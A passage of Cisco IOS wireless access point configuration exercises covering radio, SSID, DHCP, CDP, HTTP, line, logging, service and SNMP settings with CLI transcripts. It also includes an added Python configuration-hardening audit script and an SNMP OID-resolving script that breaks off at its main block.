no                      Negate a command or set its defaults
ntp                     Configure NTP
packet                  max packet retries
parent                  Specify parents with which to associate
payload-encapsulation   IEEE 802.11 packet encapsulation
power                   Set radio transmitter power levels
preamble-short          Use 802.11 short radio preamble
priority-group          Assign a priority group to an interface
random-detect           Enable Weighted Random Early Detection (WRED) on an Interface
rts                     dot11 Request To Send
service-policy          Configure QoS Service Policy
shutdown                Shutdown the selected interface
snmp                    Modify SNMP interface parameters
speed                   Set allowed radio bit rates
ssid                    Configure radio service set parameters
station-role            role of the radio
timeout                 Define timeout values for this interface
traffic-class           Radio traffic class parameters
transmit-interface      Assign a transmit interface to a receive-only interface
tx-ring-limit           Configure PA level transmit ring limit
world-mode              Dot11 radio world mode
(config-if)# world-mode ?
<cr>
(config-if)# world-mode
(config-if)# no shut
(config-if)# speed ?
1.0         Allow 1 Mb/s rate
11.0        Allow 11 Mb/s rate
2.0         Allow 2 Mb/s rate
5.5         Allow 5.5 Mb/s rate
basic-1.0   Require 1 Mb/s rate
basic-11.0  Require 11 Mb/s rate
basic-2.0   Require 2 Mb/s rate
basic-5.5   Require 5.5 Mb/s rate
range       Set rates for best range
throughput  Set rates for best throughput
<cr>
(config-if)# speed 1.0
(config-if)# ssid fred
(config-if-ssid)# max-assoc ?
<1-255>  association limit
(config-if-ssid)# max-assoc 9

Cisco Wireless Challenge 7


Outline
This challenge involves the configuration of the D0 parameters, such as the role of the
station, the antenna settings, the SSID and guest-mode. Note there is a change in Cisco IOS
12.3.
Objectives
The objectives of this challenge are to:

Define the station role.


Define the antenna settings.
Define the SSID.
Enable guest-mode on the SSID.

Example IOS Version 12.3


> enable
# config t
(config)# dot11 ssid michigan
(config-ssid)# guest-mode
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# station ?
repeater  Repeater access point
root      Root access point
(config-if)# station root
(config-if)# antenna ?
receive   receive antenna setting
transmit  transmit antenna setting
(config-if)# antenna receive ?
diversity  antenna diversity
left       antenna left
right      antenna right
(config-if)# antenna receive diversity
(config-if)# antenna transmit left
(config-if)# ssid michigan

Example IOS Version 12.1


> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# station ?
repeater  Repeater access point
root      Root access point
(config-if)# station root
(config-if)# antenna ?
receive   receive antenna setting
transmit  transmit antenna setting
(config-if)# antenna receive ?
diversity  antenna diversity
left       antenna left
right      antenna right
(config-if)# antenna receive diversity
(config-if)# antenna transmit left
(config-if)# ssid michigan
(config-if-ssid)# guest-mode

Cisco Wireless Challenge 8


Outline
This challenge involves the configuration of the D0 parameters, such as the RTS settings,
fragmentation settings, and the radio channel. Note there is a change in Cisco IOS 12.3.
Objectives
The objectives of this challenge are to:

Define RTS (request to send) settings.
Define the SSID.
Define the maximum associations for the SSID.
Define the radio channel.

Example IOS Version 12.3


> enable
# config t
(config)# dot11 ssid oklahoma
(config-ssid)# max-assoc 24
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# ssid oklahoma
(config-if)# rts ?
retries    RTS max retries
threshold  RTS threshold
(config-if)# rts threshold ?
<0-2347>  threshold in bytes
(config-if)# rts threshold 19
(config-if)# rts retries 24
(config-if)# fragment ?
<256-2346>
(config-if)# fragment 1091
(config-if)# channel 4

Example IOS Version 12.1


> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# ssid oklahoma
(config-if)# rts ?
retries    RTS max retries
threshold  RTS threshold
(config-if)# rts threshold ?
<0-2347>  threshold in bytes
(config-if)# rts threshold 19
(config-if)# rts retries 24
(config-if)# ssid oklahoma
(config-if-ssid)# max-assoc 24
(config-if-ssid)# exit
(config-if)# fragment ?
<256-2346>
(config-if)# fragment 1091
(config-if)# channel 4

Cisco Wireless Challenge 9


Outline
This challenge involves the configuration of the D0 parameters, such as for packet retries,
preamble settings, fragment limit and the radio channel. Note there is a change in Cisco IOS
12.3.
Objectives
The objectives of this challenge are to:

Define packet retry settings.


Define the SSID.
Define the maximum associations for the SSID.
Define the radio channel.

Example IOS Version 12.3


> enable
# config t
(config)# dot11 ssid oklahoma
(config-ssid)# max-assoc 24
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# packet ?
retries retries
(config-if)# packet retries ?
<1-128> max packet retries before giving up
(config-if)# packet retries 7
(config-if)# preamble-short
(config-if)# ssid oklahoma
(config-if)# fragment ?
<256-2346>
(config-if)# fragment 1091
(config-if)# channel 4

Example IOS Version 12.1


> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config)# int d0
(config-if)# packet ?
retries retries
(config-if)# packet retries ?
<1-128> max packet retries before giving up
(config-if)# packet retries 7
(config-if)# preamble-short
(config-if)# ssid oklahoma
(config-if-ssid)# max-assoc 24
(config-if-ssid)# exit
(config-if)# fragment ?
<256-2346>
(config-if)# fragment 1091
(config-if)# channel 4

Cisco Wireless Challenge 10


Outline
This challenge involves the configuration of the DHCP server on the wireless access point.
Objectives
The objectives of this challenge are to:

Define the DHCP pool.


Define the network addresses.
Define the DNS server.
Define the NetBIOS server.
Define the lease time.
Define the default router.
Define excluded addresses.

Example
The following sets up the DHCP server:
> en
# config t
(config)# ip dhcp pool Wyoming
(dhcp-config)# ?
DHCP pool configuration commands:
accounting           Send Accounting Start/Stop messages
bootfile             Boot file name
class                Specify a DHCP class
client-identifier    Client identifier
client-name          Client name
default-router       Default routers
dns-server           DNS servers
domain-name          Domain name
exit                 Exit from DHCP pool configuration mode
hardware-address     Client hardware address
host                 Client IP address and mask
import               Programatically importing DHCP option parameters
lease                Address lease time
netbios-name-server  NetBIOS (WINS) name servers
netbios-node-type    NetBIOS node type
network              Network number and mask
next-server          Next server in boot process
no                   Negate a command or set its defaults
option               Raw DHCP options
origin               Configure the origin of the pool
subnet               Subnet allocation commands
update               Dynamic updates
utilization          Configure various utilization parameters
vrf                  Associate this pool with a VRF
(dhcp-config)# n?
netbios-name-server netbios-node-type network next-server
no
(dhcp-config)# network ?
A.B.C.D Network number in dotted-decimal notation
(config-dhcp)# network 249.189.108.0 255.255.255.254
(dhcp-config)# dns ?
Hostname or A.B.C.D Server's name or IP address
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
conflict                   DHCP address conflict parameters
database                   Configure DHCP database agents
excluded-address           Prevent DHCP from assigning certain addresses
limited-broadcast-address  Use all 1's broadcast address
ping                       Specify ping parameters used by DHCP
pool                       Configure DHCP address pools
relay                      DHCP relay agent parameters
smart-relay                Enable Smart Relay feature
(config)# ip dhcp excluded-address ?
A.B.C.D  Low IP address
(config)# ip dhcp excluded-address 249.189.108.26 ?
A.B.C.D  High IP address
<cr>
(config)# ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
packets Specify number of ping packets
timeout Specify ping timeout
(config)# ip dhcp ping timeout 350

Cisco Wireless Challenge 11


Outline
This challenge involves the configuration of an IP hosts table.
Objectives
The objectives of this challenge are to:

Define a default gateway.


Define a hostname.
Define a hosts table.

Example
The following sets up an IP hosts table:
> en
# config t
(config)# ip default-gateway 36.125.171.9
(config)# hostname Montana
montana (config)# ip host ?
WORD Name of host
montana (config)# ip host tennessee ?
<0-65535>   Default telnet port number
A.B.C.D     Host IP address
additional  Append addresses
montana (config)# ip host tennessee 211.99.108.9
montana (config)# ip host kirkcaldy 154.242.2.8
montana (config)# ip host edinburgh 64.2.249.2

Cisco Wireless Challenge 12


Outline
This challenge involves the configuration of CDP (Cisco Discovery Protocol).
Objectives
The objectives of this challenge are to:

Enable CDP.
Define CDP holdtime.
Define CDP timer.
Apply CDP onto E0.

Example
The following sets up CDP:
# config t
(config)# cdp ?
advertise-v2      CDP sends version-2 advertisements
holdtime          Specify the holdtime (in sec) to be sent in packets
source-interface  Insert the interface's IP in all CDP packets
timer             Specify the rate at which CDP packets are sent (in sec)
run
(config)# cdp run
(config)# cdp holdtime ?
<10-255> Length of time (in sec) that receiver must keep this packet
(config)# cdp holdtime 66
(config)# cdp timer ?
<5-254> Rate at which CDP packets are sent (in sec)
(config)# cdp timer 94
(config)# int e0
(config-if)# cdp enable

Explanation
CDP (Cisco Discovery Protocol) is used to discover Cisco devices which connect to a given
port. It is set globally on the device with cdp run, and then the timers are set as:
# config t
(config)# cdp ?
(config)# cdp holdtime ?
(config)# cdp holdtime 120
(config)# cdp timer ?
(config)# cdp timer 50
(config)# end

To enable CDP on the wireless access point:


# config t
(config)# cdp run
(config)# end

To enable CDP on an interface:


# config t
(config)# int fa0
(config-if)# cdp ?
(config-if)# cdp enable
(config-if)# end

To show CDP information:

# show cdp ?
# show cdp neighbors
# show cdp neighbors detail
# show cdp neighbors traffic

Cisco Wireless Challenge 13


Outline
This challenge involves the configuration of HTTP server details.
Objectives
The objectives of this challenge are to:

Enable the HTTP server.


Define the HTTP server port.
Define the HTTP authentication.
Enable various banners.

Example
The following sets up the HTTP server parameters:
> en
# config t
(config)# ip http ?
access-class        Restrict http server access by access-class
authentication      Set http server authentication method
client              Set http client parameters
help-path           HTTP help root URL
max-connections     Set maximum number of concurrent http server connections
path                Set base path for HTML
port                Set http server port
secure-ciphersuite  Set http secure server ciphersuite
secure-client-auth  Set http secure server with client authentication
secure-port         Set http secure server port number for listening
secure-server       Enable HTTP secure server
secure-trustpoint   Set http secure server certificate trustpoint
server              Enable http server
timeout-policy      Set http server time-out policy parameters
(config)# ip http server
(config)# ip http port ?
<0-65535>  HTTP port
(config)# ip http port 1024
(config)# ip http authentication ?
enable  Use enable passwords
local   Use local username and passwords
tacacs  Use tacacs to authorize user
(config)# ip http authentication local
(config)# ip http help-path ?
WORD root URL for help pages
(config)# ip http help-path file:///c:\wireless\help
(config)# ip http access-class 10
(config)# banner motd gorgie home
(config)# banner login welcome
(config)# banner exec admin device

Cisco Wireless Challenge 14


Outline
This challenge involves the configuration of console and Telnet parameters.
Objectives
The objectives of this challenge are to:

Define the console password.


Define the timeout for the console.
Define the Telnet password.
Define the timeout for Telnet sessions.

Example
The following sets up the CON and VTY settings:
> en
# config t
(config)# line con 0
(config-line)# ?
Line configuration commands:
access-class            Filter connections based on an IP access list
activation-character    Define the activation character
autocommand             Automatically execute an EXEC command
autocommand-options     Autocommand options
data-character-bits     Size of characters being handled
databits                Set number of data bits per character
default                 Set a command to its defaults
domain-lookup           Enable domain lookups in show commands
editing                 Enable command line editing
escape-character        Change the current line's escape character
exec                    Configure EXEC
exec-banner             Enable the display of the EXEC banner
exec-character-bits     Size of characters to the command exec
exec-timeout            Set the EXEC timeout
exit                    Exit from line configuration mode
flowcontrol             Set the flow control
full-help               Provide help to unprivileged user
help                    Description of the interactive help system
history                 Enable and control the command history function
international           Enable international 8-bit character support
ip                      IP options
length                  Set number of lines on a screen
location                Enter terminal location description
logging                 Modify message logging facilities
login                   Enable password checking
modem                   Configure the Modem Control Lines
monitor                 Copy debug output to the current terminal line
motd-banner             Enable the display of the MOTD banner
no                      Negate a command or set its defaults
notify                  Inform users of output from concurrent sessions
padding                 Set padding for a specified output character
parity                  Set terminal parity
password                Set a password
privilege               Change privilege level for line
refuse-message          Define a refuse banner
rotary                  Add line to a rotary group
rxspeed                 Set the receive speed
session-timeout         Set interval for closing connection when there is no input traffic
special-character-bits  Size of the escape (and other special) characters
speed                   Set the transmit and receive speeds
start-character         Define the start character
stop-character          Define the stop character
stopbits                Set async line stop bits
terminal-type           Set the terminal type
timeout                 Timeouts for the line
transport               Define transport protocols for line
txspeed                 Set the transmit speeds
vacant-message          Define a vacant banner
width                   Set width of the display terminal
(config-line)# password lothian
(config-line)# timeout ?
login Timeouts related to the login sequence
(config-line)# timeout login ?
response Timeout for any user input during login sequences
(config-line)# timeout login response ?
<0-300> Timeout in seconds
(config-line)# timeout login response 19
(config-line)# exec-timeout ?
<0-35791> Timeout in minutes
(config-line)# exec-timeout 11
(config-line)# logging ?
synchronous Synchronized message output
(config-line)# logging synchronous
(config-line)# line vty 0 8
(config-line)# login
(config-line)# password mississippi
(config-line)# timeout login response 12
(config-line)# exec-timeout 10

Cisco Wireless Challenge 15


Outline
This challenge involves the configuration of a loopback address, and a few other settings.
Objectives
The objectives of this challenge are to:

Set the clock.


Allow zero subnets.
Define a DHCP pool.
Define the E0 IP address and subnet mask.
Define a loopback address and subnet mask.

Example
The following sets up loopback settings:
> en
# clock ?
set Set the time and date
# clock set 03:52
# config t
(config)# ip subnet-zero
(config)# ip dhcp pool ion
(config)# int e0
(config-if)# ip address 80.24.45.1 255.255.252.0
(config-if)# no shutdown
(config-if)# exit
(config)# int loopback ?
<0-2147483647> Loopback interface number
(config)# int loopback 45
(config-if)# ip address 195.253.209.21 255.255.128.0

Cisco Wireless Challenge 16


Outline
This challenge involves the configuration of logging.
Objectives
The objectives of this challenge are to:

Enable logging.
Define logging levels.

Example
The following sets up logging:
> enable
# config t
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffer ?
<0-7>              Logging severity level
<4096-2147483647>  Logging buffer size
alerts             Immediate action needed (severity=1)
critical           Critical conditions (severity=2)
debugging          Debugging messages (severity=7)
emergencies        System is unusable (severity=0)
errors             Error conditions (severity=3)
informational      Informational messages (severity=6)
notifications      Normal but significant conditions (severity=5)
warnings           Warning conditions (severity=4)
xml                Enable logging in XML to XML logging buffer
<cr>
(config)# logging buffer 440240
(config)# logging host 138.24.170.8
(config)# logging trap ?
<0-7>          Logging severity level
alerts         Immediate action needed (severity=1)
critical       Critical conditions (severity=2)
debugging      Debugging messages (severity=7)
emergencies    System is unusable (severity=0)
errors         Error conditions (severity=3)
informational  Informational messages (severity=6)
notifications  Normal but significant conditions (severity=5)
warnings       Warning conditions (severity=4)
<cr>
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffer emergency

Cisco Wireless Challenge 17


Outline
This challenge involves the configuration of services.
Objectives
The objectives of this challenge are to:

Define logging timestamps.


Disable UDP small servers.
Disable TCP small servers.
Define that passwords are encrypted.

Example
The following sets up the services:
> en
# config t
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug  Timestamp debug messages
log    Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime  Timestamp with date and time
uptime    Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption
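
Challenges 13, 14 and 17 together cover the settings a reviewer checks first in a saved configuration: whether the HTTP server authenticates against a local user database and is restricted by an access-class, whether line passwords are encrypted and idle sessions time out, and whether the small servers and finger are switched off. The following Python script is an added example, not NetworkSims or Cisco code. It parses a running-config in IOS layout (indented lines belong to the unindented line above them) and reports those conditions. Both configurations in it are constructed: the weak one, and the same device after the commands from the three challenges have been applied. The finding codes are the script's own names.

```python
def parse_sections(config_text):
    """Split an IOS running-config into (header, sub_lines) blocks. A line that
    starts with whitespace belongs to the most recent unindented line, which is
    how IOS prints 'line con 0' followed by ' password ...' / ' exec-timeout ...'."""
    sections = []
    for raw in config_text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue                      # blank lines and '!' separators
        if raw[0].isspace() and sections:
            sections[-1][1].append(raw.strip())
        else:
            sections.append((raw.strip(), []))
    return sections


def audit(config_text):
    """Return (code, message) findings for the settings the challenges above
    configure: HTTP server access, line passwords/timeouts and 'service' toggles."""
    sections = parse_sections(config_text)
    top = {hdr for hdr, _ in sections}          # global configuration lines
    findings = []

    # Challenge 13: the web server should use local usernames and an access-class
    if "ip http server" in top:
        if not any(g.startswith("ip http authentication ") for g in top):
            findings.append(("HTTP-AUTH", "ip http server without 'ip http authentication'"))
        if not any(g.startswith("ip http access-class ") for g in top):
            findings.append(("HTTP-ACL", "ip http server not limited by 'ip http access-class'"))

    # Challenge 17: small servers and finger answer unauthenticated probes
    for svc in ("tcp-small-servers", "udp-small-servers", "finger"):
        if "service " + svc in top:
            findings.append(("SVC-" + svc.upper(),
                             "'service %s' is enabled; use 'no service %s'" % (svc, svc)))

    # Challenges 14 and 17: line passwords stay in clear text unless encrypted
    lines = [(hdr, subs) for hdr, subs in sections if hdr.startswith("line ")]
    if (any(s.startswith("password ") for _, subs in lines for s in subs)
            and "service password-encryption" not in top):
        findings.append(("PWD-CLEAR", "line passwords in clear text; add 'service password-encryption'"))

    for hdr, subs in lines:
        # 'exec-timeout 0' (or '0 0') disables the idle timeout entirely
        if any(s.split()[1:] in (["0"], ["0", "0"])
               for s in subs if s.startswith("exec-timeout ")):
            findings.append(("LINE-NOTIMEOUT", hdr + ": exec-timeout 0 never expires"))
        # a vty line without 'login' accepts sessions without checking the password
        if hdr.startswith("line vty") and not any(
                s == "login" or s.startswith("login ") for s in subs):
            findings.append(("VTY-NOLOGIN", hdr + ": no 'login', password is not checked"))
    return findings


def codes(config_text):
    """Just the finding codes, in order, for quick comparison."""
    return [code for code, _ in audit(config_text)]


# Constructed configurations (not captured from a device)
WEAK_CONFIG = """\
!
service finger
service tcp-small-servers
no service password-encryption
hostname ap-weak
!
ip http server
ip http port 1024
!
line con 0
 password lothian
 exec-timeout 0 0
line vty 0 4
 password mississippi
 no login
 exec-timeout 10
!
"""

HARDENED_CONFIG = """\
!
service timestamps log datetime
service sequence-numbers
no service tcp-small-servers
no service udp-small-servers
service password-encryption
hostname ap-hardened
!
ip http server
ip http port 1024
ip http authentication local
ip http access-class 10
!
line con 0
 password lothian
 exec-timeout 11
 timeout login response 19
 logging synchronous
line vty 0 8
 login
 password mississippi
 exec-timeout 10
!
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name + ":")
        for code, msg in audit(cfg) or [("OK", "no findings")]:
            print("  %-22s %s" % (code, msg))
```

The script only looks for lines that are present, so it cannot tell whether a setting is on by default on a given IOS release; the service checks above fire on an explicit service tcp-small-servers and are silent when the line is absent, which is why the hardened configuration states the no service form explicitly as the challenge does.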

Cisco Wireless Challenge 18


Outline
This challenge involves the configuration of the SNMP server.
Objectives
The objectives of this challenge are to:

Define SNMP community string.


Define SNMP contact.
Define SNMP location.
Enable SNMP traps.

Example
The following sets up the SNMP settings:
# config t
(config)# snmp-server ?
chassis-id        String to uniquely identify this chassis
community         Enable SNMP; set community string and access privs
contact           Text for mib object sysContact
enable            Enable SNMP Traps or Informs
engineID          Configure a local or remote SNMPv3 engineID
group             Define a User Security Model group
host              Specify hosts to receive SNMP notifications
ifindex           Enable ifindex persistence
inform            Configure SNMP Informs options
location          Text for mib object sysLocation
manager           Modify SNMP manager parameters
packetsize        Largest SNMP packet size
queue-length      Message queue length for each TRAP host
system-shutdown   Enable use of the SNMP reload command
tftp-server-list  Limit TFTP servers used via SNMP
trap              SNMP trap options
trap-source       Assign an interface for the source address of all traps
trap-timeout      Set timeout for TRAP message retransmissions
user              Define a user who can access the SNMP engine
view              Define an SNMPv2 MIB view
(config)# snmp-server community popup
(config)# snmp-server contact june
(config)# snmp-server location glasgow
(config)# snmp-server ?
chassis-id        String to uniquely identify this chassis
community         Enable SNMP; set community string and access privs
contact           Text for mib object sysContact
enable            Enable SNMP Traps or Informs
engineID          Configure a local or remote SNMPv3 engineID
group             Define a User Security Model group
host              Specify hosts to receive SNMP notifications
ifindex           Enable ifindex persistence
inform            Configure SNMP Informs options
location          Text for mib object sysLocation
manager           Modify SNMP manager parameters
packetsize        Largest SNMP packet size
queue-length      Message queue length for each TRAP host
system-shutdown   Enable use of the SNMP reload command
tftp-server-list  Limit TFTP servers used via SNMP
trap              SNMP trap options
trap-source       Assign an interface for the source address of all traps
trap-timeout      Set timeout for TRAP message retransmissions
user              Define a user who can access the SNMP engine
view              Define an SNMPv2 MIB view
(config)# snmp-server enable ?
informs  Enable SNMP Informs
traps    Enable SNMP Traps
(config)# snmp-server enable traps
(config)# snmp-server chassis-id brighton
(config)# snmp-server enable traps
(config)# snmp-server chassis-id brighton

Explanation
SNMP (Simple Network Management Protocol) is a well-supported standard which can be
used to monitor and control devices. It typically runs on hubs, switches and bridges. Many
SNMP devices provide both general network management and device management
through a serial cable, modem, or over the network from a remote computer. It involves a
primary management station communicating with different management processes. Figure
1 shows an outline of an SNMP-based system. An SNMP agent runs SNMP management
software. An SNMP server sends commands to the agent, which responds with the
results. In this figure the server asks the agent for its routing information and the agent
responds with its routing table. These responses can either be polled (the server sends a
request for information) or interrupt-driven (where the agent sends its information at given
events). A polled system tends to increase network traffic, as the agent may not have any
updated information (and the server must re-poll for the information).
The SNMP (Simple Network Management Protocol) protocol was initially defined in
RFC 1157. It defines a simple protocol which gives each network element a management
information base (MIB). There are two types of MIB: MIB-1 and MIB-2. MIB-1 was defined
in 1988 and has 114 table entries, divided into two groups. MIB-2 is a 1990 enhancement
which has 171 entries organized into 10 groups (RFC 1213). Most devices are MIB-1
compliant, and newer ones support both MIB-1 and MIB-2.
The database contains entries with four fields:

Object type. Defines the name of the entry.
Syntax. Gives the actual value (as a string or an integer).
Access field. Defines whether the value is read-only, read/write, write-only or not
accessible.
Status field. Contains an indication on whether the entry in the MIB is mandatory (the
managed device must implement the entry), optional (the managed device may
implement the entry) or obsolete (the entry is not used).

SNMP is a very simple protocol but suffers from the fact that it is based on connectionless,
unreliable UDP. The IAB have recommended that the Common Management Information
Services (CMIS) and Common Management Information Protocol (CMIP) be accepted as
standard for future TCP/IP systems. The two main versions of SNMP are SNMP Ver1 and
SNMP Ver2. SNMP has added security to stop intruders from determining network loading or
the state of the network.
The SNMP architecture is based on a collection of:

Network management stations. These execute management applications which monitor
and control network elements.
Network elements. These are devices such as hosts, gateways, terminal servers, and so
on and have management agents which perform network management functions
replying to requests from network management stations.
Figure 1 SNMP architecture: SNMP server software sends "Routing information?" to the
SNMP-managed devices (each running managed agent software with its own MIB), and each
SNMP agent answers with its routing table.

SNMP on a wireless access point


The SNMP (Simple Network Management Protocol) is a powerful method of gaining
information on the operation of the network. The snmp-server command is used to enable
SNMP monitoring. The snmp-server community command is used to initialise SNMP and
set the community string (which is basically used as a type of password for SNMP
access). For example, to define the read-only string as public:

# config t
(config)# snmp-server community public RO

The RO defines read-only access, while RW defines read-write access. To set up the SNMP
contact and the location:
(config)# snmp-server contact fred smith
(config)# snmp-server location room c6

SNMP contains a database of monitored network conditions, such as the number of errors in
data packets, the IP addresses of the interfaces, and so on. It can also be set up to trigger on
certain traps, such as syslog traps. To enable all SNMP traps so that all the data is
monitored:
(config)# snmp-server enable traps

Then to send these traps to a remote host (to www.myhost.com):


# config t
(config)# snmp-server host www.myhost.com public

To determine the status of the SNMP communications:


# show snmp

and to display the SNMP engine and remote engines:


# show snmp engine

and to display the SNMP group:


# show snmp group

SNMP uses an MIB database to store its values. To display its contents:
# show snmp mib

SNMP tree structure


The MIB tree structure is addressed by a long sequence of numbers separated by dots, such as
.1.3.6.1.2.1.1.4.0 (where the trailing .0 represents an end node). This number is called an
Object Identifier (OID). The OID is a numerical representation of a path through the MIB
tree: each number represents one node in the tree. The trunk of the tree is on the left and
the leaves are on the right, as illustrated in Figure 2 and Figure 3.


Figure 2 SNMP object ID (.1.3.6.1.2.1.1.4.0)

  .0 CCITT
  .1 ISO
     .3 ISO (org)
        .6 DOD
           .1 Internet
              .1 Directory
              .2 Management
                 .1 System MIB
              .3 Experimental
              .4 Private

Figure 3 SNMP object ID (.1.3.6.1.2.1.1.4.0): objects in the System MIB
  sysDescr (1), sysObjectID (2), sysUpTime (3), sysContact (4),
  sysName (5), sysLocation (6), sysServices (7)

For example a node with an ID of 1.3.6.1.2.1.5.1.0 has the following structure:

iso(1).
org(3).
dod(6).
internet(1).
mgmt(2).
mib-2(1).
icmp(5).
icmpInMsgs(1).

For a router, example objects are:

MIB name            Description          Object ID
sysName             Hostname             .1.3.6.1.2.1.1.5.0
sysUpTime           Uptime               .1.3.6.1.2.1.1.3.0
sysDescr            System Description   .1.3.6.1.2.1.1.1.0
sysContact          System Contact       .1.3.6.1.2.1.1.4.0
sysLocation         System Location      .1.3.6.1.2.1.1.6.0
ciscoImageString    IOS Version          .1.3.6.1.4.1.9.9.25.1.1.1.2.5
avgBusy1            1-Minute CPU Util.   .1.3.6.1.4.1.9.2.1.57.0
avgBusy5            5-Minute CPU Util.   .1.3.6.1.4.1.9.2.1.58.0
freeMem             Free memory          .1.3.6.1.4.1.9.2.1.8.0
ciscoImageString.4  IOS feature set      .1.3.6.1.4.1.9.9.25.1.1.1.2.4
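As an added example (not from the NetworkSims page), the following Python resolves a dotted OID into the named path through the MIB tree shown in Figures 2 and 3 and in the icmpInMsgs walk-through, and looks up the router objects from the table. The branch enterprises(1).cisco(9) under private(4) is standard IANA numbering that the page does not spell out; it is an assumption added here so that the Cisco OIDs in the table resolve past the private node.

```python
# Added example: walk an SNMP OID through the MIB tree described on the page.
# Tree contents come from Figures 2 and 3 and the icmpInMsgs walk-through; the
# enterprises(1).cisco(9) branch is standard IANA numbering (assumed, not on page).
from typing import Dict, List, Optional, Tuple

Node = Tuple[str, Dict[int, "Node"]]  # (name, children keyed by sub-identifier)

def _n(name: str, children: Optional[Dict[int, Node]] = None) -> Node:
    return (name, children or {})

SYSTEM_GROUP = _n("system", {
    1: _n("sysDescr"), 2: _n("sysObjectID"), 3: _n("sysUpTime"),
    4: _n("sysContact"), 5: _n("sysName"), 6: _n("sysLocation"),
    7: _n("sysServices"),
})

MIB_TREE: Node = _n("", {
    0: _n("ccitt"),
    1: _n("iso", {3: _n("org", {6: _n("dod", {1: _n("internet", {
        1: _n("directory"),
        2: _n("mgmt", {1: _n("mib-2", {
            1: SYSTEM_GROUP,
            5: _n("icmp", {1: _n("icmpInMsgs")}),
        })}),
        3: _n("experimental"),
        4: _n("private", {1: _n("enterprises", {9: _n("cisco")})}),  # assumed branch
    })})})}),
})

# Router objects from the table above: OID -> (MIB name, description)
ROUTER_OBJECTS = {
    ".1.3.6.1.2.1.1.5.0": ("sysName", "Hostname"),
    ".1.3.6.1.2.1.1.3.0": ("sysUpTime", "Uptime"),
    ".1.3.6.1.2.1.1.1.0": ("sysDescr", "System Description"),
    ".1.3.6.1.2.1.1.4.0": ("sysContact", "System Contact"),
    ".1.3.6.1.2.1.1.6.0": ("sysLocation", "System Location"),
    ".1.3.6.1.4.1.9.2.1.57.0": ("avgBusy1", "1-Minute CPU Util."),
    ".1.3.6.1.4.1.9.2.1.58.0": ("avgBusy5", "5-Minute CPU Util."),
    ".1.3.6.1.4.1.9.2.1.8.0": ("freeMem", "Free memory"),
}

def parse_oid(oid: str) -> List[int]:
    """Turn '.1.3.6.1.2.1.1.4.0' (leading dot optional) into [1, 3, 6, ...]."""
    parts = oid.strip().lstrip(".").split(".")
    if not parts or any(not p.isdigit() for p in parts):
        raise ValueError(f"malformed OID: {oid!r}")
    return [int(p) for p in parts]

def oid_to_name(oid: str) -> str:
    """Walk the tree from the trunk; sub-identifiers below a known node stay numeric."""
    names: List[str] = []
    node: Optional[Node] = MIB_TREE
    for sub_id in parse_oid(oid):
        if node is not None and sub_id in node[1]:
            node = node[1][sub_id]
            names.append(node[0])
        else:
            node = None  # left the known part of the tree; emit raw numbers from here
            names.append(str(sub_id))
    return ".".join(names)

def is_scalar_instance(oid: str) -> bool:
    """Scalar objects such as sysContact are read at instance .0 (the end node)."""
    return parse_oid(oid)[-1] == 0

def describe(oid: str) -> Optional[Tuple[str, str]]:
    """Look up a router object by OID, tolerating a missing leading dot."""
    return ROUTER_OBJECTS.get("." + ".".join(str(i) for i in parse_oid(oid)))

if __name__ == "__main__":
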